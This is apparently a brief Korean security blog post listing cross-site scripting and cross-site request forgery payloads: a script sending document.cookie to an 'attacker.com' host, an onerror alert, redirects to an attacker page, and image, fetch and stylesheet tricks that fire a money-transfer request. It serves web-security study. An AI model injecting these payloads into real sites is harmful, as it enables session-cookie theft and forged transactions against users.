본문 바로가기
2. Information Security/1. Insight

3. XSS

by H232C 2020. 1. 13.

 

1. XSS

<script>

alert("test"); document.cookie; alert(document.cooki);

new Image().src = "https://attacker.com/?savecookie="+document.cookie;

</script>

 

<img src="@" onerror="alert('xss');">

 

<script>

location.href="https://attaker.com/attack.jsp"; window.open("http://attacker.com/attack.jsp");

</script>

- Stored XSS : DB등에 악성 스크립트를 저장시켜 호출 시 동작하게 함

- Reflected XSS : 팔라미터입력값에 악성 스크립트를 삽입하여 출력 시 동작하게 함 (주로 검색, 오류 페이지 등 사용)

 

2. CSRF

<img src="/money?to=test&money=1000">

<img src=1 onerror="fetch('/money?to=test&money=1000');>"

<link rel="stylesheet" href="/money?to=test&money=1000">

'2. Information Security > 1. Insight' 카테고리의 다른 글

6. Filtering 우회  (0) 2020.02.11
5. Filtering 우회  (0) 2020.02.05
4. SQL INJECTION CHEAT SHEET (SQL 인젝션 치트 시트)  (0) 2020.02.04
2. SQL INJECTION CHEAT SHEET (SQL 인젝션)  (0) 2019.10.20
1. PHP Security  (0) 2019.10.20

댓글